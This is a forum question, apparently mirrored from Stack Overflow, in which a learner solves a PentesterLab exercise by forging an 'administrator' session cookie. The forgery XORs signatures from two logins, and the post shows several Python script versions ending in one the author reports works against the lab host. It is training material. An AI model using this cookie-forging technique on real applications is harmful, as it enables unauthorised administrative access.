
XOR'ing bytes and string for signing cookie

I'm trying to solve an exercise from PentesterLab. In short, these are the steps I need to do:

  • Login as "administ"
  • Decode the cookie, extract the signature
  • XOR the signature with "rator"
  • Login with this value as username
  • Decode the new cookie, extract the signature
  • Concatenate the signature with "administrator" to get the cookie
  • Send the cookie to the application

I am stuck at XOR'ing. If I XOR b"administ" and "\00\00\00\00\00\00\00\00" I get what I expected, but when XOR'ing b"strator" and the signature I get '·gæ¿pk=\x91', which I believe isn't correct. Could someone point me in the right direction?

#cookie: YWRtaW5pc3QtLcUGktACaz2R

#decoded = administ--k=

#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php'  --data-raw 'username=administ&password=Password1'

import requests
import base64

session = requests.Session()  # one shared cookie jar; login() below reads the 'auth' cookie from it
#print(session.cookies.get_dict())

URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'  # base URL of the lab instance
#USERNAME = 'administ'
PASSWORD = 'Password1'  # fixed password of the exercise account, reused for every login()

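def login(username):
    """Log in as ``username`` with the fixed lab password and return the raw ``auth`` cookie.

    Args:
        username: value sent in the ``username`` form field (a ``str`` or ``bytes``
            is passed here elsewhere in this script).

    Returns:
        The ``auth`` cookie value taken from the shared ``session`` jar after the
        POST, with a trailing single quote stripped.

    Raises:
        KeyError: if ``login.php`` set no ``auth`` cookie (e.g. the login was rejected).
    """
    payload = {
        'action': 'login',
        'username': username,
        'password': PASSWORD,
    }

    # Only the cookie jar matters here; the response body is never inspected,
    # so the Response object is not kept.  URL is the base configured above.
    session.post(URL + 'login.php', data=payload)

    cookies = session.cookies.get_dict()
    if 'auth' not in cookies:
        raise KeyError("login.php set no 'auth' cookie for username %r" % (username,))
    return cookies['auth'].rstrip("\'")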

#print(cookie)#['auth'].rstrip("\'"))

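cookie = login("administ")

# The decoded cookie has the layout "<username>--<signature>".  partition() keeps
# everything after the first "--"; split(b"--")[1] would silently truncate the
# signature if the binary signature itself happened to contain the bytes b"--".
signature = base64.b64decode(cookie).partition(b"--")[2]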

def byte_xor(a,b):
    """XOR two byte strings index-wise, cycling the shorter one, and return a ``str``.

    The result has ``max(len(a), len(b))`` characters; character ``i`` is
    ``chr(a[i % len(a)] ^ b[i % len(b)])``.  Because ``chr()`` is used, the
    result is text rather than bytes, and XOR values above 0x7F become
    non-ASCII code points.  An empty operand next to a non-empty one raises
    ``ZeroDivisionError`` from the modulo.
    """
    len_a, len_b = len(a), len(b)
    width = max(len_a, len_b)
    # Modular indexing wraps the shorter operand around for the whole width.
    return ''.join(chr(a[i % len_a] ^ b[i % len_b]) for i in range(width))

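username2 = byte_xor(b"rator\00\00\00", signature)

cookie2 = login(username2)

# Restore any base64 padding the cookie value is missing (a no-op when it is
# already padded), then keep the whole signature after the first "--".
padded2 = cookie2 + "=" * (-len(cookie2) % 4)
signature2 = base64.b64decode(padded2).partition(b"--")[2]

# b64encode() needs bytes: encode the concatenated "administrator--<signature>"
# payload once.  Passing a str (and a non-f-string at that) raised TypeError.
print(base64.b64encode(b"administrator--" + signature2))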

I've also tried two other functions without success:

def byte_xor(a,b):
    """XOR ``a`` and ``b`` position by position, wrapping the shorter one, as a ``str``.

    Produces ``max(len(a), len(b))`` characters, each ``chr()`` of the XOR of
    ``a[i % len(a)]`` and ``b[i % len(b)]``; values above 0x7F therefore turn
    into non-ASCII code points instead of single bytes.  If exactly one operand
    is empty the modulo raises ``ZeroDivisionError``.
    """
    len_a, len_b = len(a), len(b)
    pieces = [chr(a[i % len_a] ^ b[i % len_b]) for i in range(max(len_a, len_b))]
    return ''.join(pieces)

def bxor(b1, b2): # use xor for bytes
    """Return the bytewise XOR of ``b1`` and ``b2`` as ``bytes``.

    ``zip()`` stops at the shorter operand, so the result is
    ``min(len(b1), len(b2))`` bytes long and surplus bytes are dropped.
    """
    return bytes(x ^ y for x, y in zip(b1, b2))

I improved it and everything seems to work, but the cookie is still wrong:

#YWRtaW5pc3QtLcUGktACaz2R                                                                                                                                                                                          
                                                                                                                                                                                                                   
#decoded = administ--k=                                                                                                                                                                                            
                                                                                                                                                                                                                   
#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php'  --data-raw 'username=administ&password=Password1'                                                                                                       
                                                                                                                                                                                                                   
import requests                                                                                                                                                                                                    
import base64                                                                                                                                                                                                      
import sys                                                                                                                                                                                                         
                                                                                                                                                                                                                   
session = requests.Session()  # one shared cookie jar; login() below reads the 'auth' cookie from it
#print(session.cookies.get_dict())

URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'  # base URL of the lab instance
#USERNAME = 'administ'
PASSWORD = 'Password1'  # fixed password of the exercise account, reused for every login()

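def login(username):
    """Log in as ``username`` with the fixed lab password and return the raw ``auth`` cookie.

    Args:
        username: value sent in the ``username`` form field (a ``str`` or ``bytes``
            is passed here elsewhere in this script).

    Returns:
        The ``auth`` cookie value taken from the shared ``session`` jar after the
        POST, with a trailing single quote stripped.

    Raises:
        KeyError: if ``login.php`` set no ``auth`` cookie (e.g. the login was rejected).
    """
    payload = {
        'action': 'login',
        'username': username,
        'password': PASSWORD,
    }

    # Only the cookie jar matters here; the response body is never inspected,
    # so the Response object is not kept.  URL is the base configured above.
    session.post(URL + 'login.php', data=payload)

    cookies = session.cookies.get_dict()
    if 'auth' not in cookies:
        raise KeyError("login.php set no 'auth' cookie for username %r" % (username,))
    return cookies['auth'].rstrip("\'")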

#print(cookie)#['auth'].rstrip("\'"))

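cookie = login("administ")

# The decoded cookie has the layout "<username>--<signature>".  partition() keeps
# everything after the first "--"; split(b"--")[1] would silently truncate the
# signature if the binary signature itself happened to contain the bytes b"--".
signature = base64.b64decode(cookie).partition(b"--")[2]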

def bxor(b1, b2): # use xor for bytes
    """XOR ``b1`` and ``b2`` element-wise and return a ``list`` of ints (not bytes).

    ``zip()`` pairs elements only up to the shorter operand, so the list has
    ``min(len(b1), len(b2))`` entries.
    """
    return [x ^ y for x, y in zip(b1, b2)]
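username2 = bxor(bytearray('rator\00\00\00', encoding='utf8'), signature)
# NOTE(review): chr() turns each XOR result into a str code point; any value
# above 0x7F is then a non-ASCII character, not a single byte, once the form
# field is encoded for the request -- TODO confirm that is what the server sees.
username3 = ''.join(chr(n) for n in username2)

print(username3)

cookie2 = login(username3)
print(cookie2)

# Restore only the padding the cookie value is missing (a no-op when it is
# already padded) instead of blindly appending "==".
padded2 = cookie2 + "=" * (-len(cookie2) % 4)
# partition() keeps the full signature even if it contains the bytes b"--".
signature2 = base64.b64decode(padded2).partition(b"--")[2]

# Encode the concatenated payload once: base64 is not concatenation-friendly,
# b64encode(x) + b64encode(y) != b64encode(x + y) because the first part ends
# in "=" padding whenever len(x) is not a multiple of 3 (15 bytes here).
cookie_final = base64.b64encode(b"administrator--" + signature2)

print(cookie_final)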

OH MY GOD I DID IT!

#WRtaW5pc3QtLcUGktACaz2R

#decoded = administ--k=

#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php'  --data-raw 'username=administ&password=Password1'

import base64
import sys
import urllib.parse

import requests

session = requests.Session()  # one shared cookie jar; login() below reads the 'auth' cookie from it
#print(session.cookies.get_dict())

URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'  # base URL of the lab instance
#USERNAME = 'administ'
PASSWORD = 'Password1'  # fixed password of the exercise account, reused for every login()

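def login(username):
    """Log in as ``username`` with the fixed lab password and return the raw ``auth`` cookie.

    Args:
        username: value sent in the ``username`` form field (a ``str`` or ``bytes``
            is passed here elsewhere in this script).

    Returns:
        The ``auth`` cookie value taken from the shared ``session`` jar after the
        POST, with a trailing single quote stripped.  The value is returned as
        the server sent it, so any percent-encoding is still present.

    Raises:
        KeyError: if ``login.php`` set no ``auth`` cookie (e.g. the login was rejected).
    """
    payload = {
        'action': 'login',
        'username': username,
        'password': PASSWORD,
    }

    # Only the cookie jar matters here; the response body is never inspected,
    # so the Response object is not kept.  URL is the base configured above.
    session.post(URL + 'login.php', data=payload)

    cookies = session.cookies.get_dict()
    if 'auth' not in cookies:
        raise KeyError("login.php set no 'auth' cookie for username %r" % (username,))
    return cookies['auth'].rstrip("\'")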

#print(cookie)#['auth'].rstrip("\'"))

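cookie = login("administ")

# The decoded cookie has the layout "<username>--<signature>".  partition() keeps
# everything after the first "--"; split(b"--")[1] would silently truncate the
# signature if the binary signature itself happened to contain the bytes b"--".
signature = base64.b64decode(cookie).partition(b"--")[2]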

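def encrypt2(var, key, byteorder=sys.byteorder):
    """XOR ``var`` with ``key`` byte-for-byte and return the result as ``bytes``.

    Both operands are truncated to the length of the shorter one, so the result
    is ``min(len(var), len(key))`` bytes long and an empty operand yields ``b""``.

    Args:
        var: bytes-like operand (the padded username in this script).
        key: bytes-like operand (the signature extracted from the cookie).
        byteorder: accepted for backward compatibility only.  A bytewise XOR
            is independent of byte order, so the int.from_bytes/to_bytes
            round-trip is unnecessary and this argument is ignored.

    Returns:
        ``bytes`` holding the pairwise XOR of the two inputs.
    """
    # zip() stops at the shorter operand, which is the same truncation as
    # slicing each input to the other's length.
    return bytes(x ^ y for x, y in zip(var, key))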

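username2 = encrypt2(b"rator\00\00\00", signature)

# The cookie value comes back percent-encoded by the server ("+" arrives as
# "%2B").  Decode every escape rather than only "%2B", so the other base64
# characters that get escaped ("/" as "%2F", "=" as "%3D") are restored too.
cookie2 = urllib.parse.unquote(login(username2))

# Restore only the padding that is missing (a no-op when already padded), then
# keep the whole signature after the first "--" even if it contains b"--" itself.
padded2 = cookie2 + "=" * (-len(cookie2) % 4)
signature2 = base64.b64decode(padded2).partition(b"--")[2]

# One base64 encoding over the whole "administrator--<signature>" payload.
print(base64.b64encode(b"administrator--" + signature2))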


 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM